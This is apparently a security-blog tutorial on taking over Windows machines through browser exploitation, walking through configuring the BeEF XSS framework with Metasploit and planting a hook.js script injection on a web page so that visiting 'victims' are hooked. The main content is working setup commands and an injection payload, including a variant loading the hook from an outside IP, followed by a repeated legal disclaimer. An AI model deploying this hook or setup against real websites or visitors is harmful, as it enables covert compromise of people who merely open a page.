SMT

Resource

Center

 

Coming Soon

Security Management Technology Center Develop Elearning, FAQ , New Center...

SMT BLOG

beef

Today I will show you how to own a windows operating system using a technique called browser explotition, to carry out this technique you need a pentration testing distro for example Kali with beef framework and metasploit.

First thing we need to fireup our linux distro and run beef framework plus we need to integrate metasploit with beef-xss framework to do so follow the following commands:

Step One

  • Open up a terminal and type in: nano /usr/share/beef-xss/config.yaml
  • scroll down to
    • metasploit:
                  enable: false <-- change it to true

    integrate metasploit with beef

     

  • save Press Ctrl+X to save the file

 

Step Two

Now in the same terminal do the following steps:

  • Type in nano extensions/metasploit/config.yaml
  • change user & pass to the one that you use

integrate metasploit with beef2

  • Scroll down and change msf_path to your metasploit path

integrate metasploit with beef3

  • save Press Ctrl+X to save the file

 

Step Three

open up a new terminal and type:

/etc/init.d/postgresql restart && /etc/init.d/metasploit restart

after that type in msfconsole and wait until it loads then type

load msgrpc ServerHost=127.0.0.1 Pass=abc123

integrate metasploit with beef4

 

Now lunch beef frame work by opening a terminal and navigating to:

/usr/share/beef-xss

and type: ./beef

integrate metasploit with beef6

If you do the steps correctly you will get Successful connection with Metasploit

Step Four

Open your browser and navigate to: http://127.0.0.1:3000/ui/authentication

Username: beef

Password: beef

integrate metasploit with beef7

 

Now to own a windows PC you have use the following hook.js file and insert it to your index page or you can use one of the demo pages that beef has.

<script>
        var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
        document.write(commandModuleStr);
    </script>

When your victim visit the page or the site you will have there IP Address on the online browser.

integrate metasploit with beef8

P.S you can use your IP Address instead of the that code by doing so:


<script src="/http://123.123.123.123/hook.js"></script>

 

** Disclaimer **

Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator is responsible for the comments posted on this website.

** Disclaimer **

Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator is responsible for the comments posted on this website.

Newsletter

Subscribe to our newsletter and stay updated on the latest news and special offers!
Please wait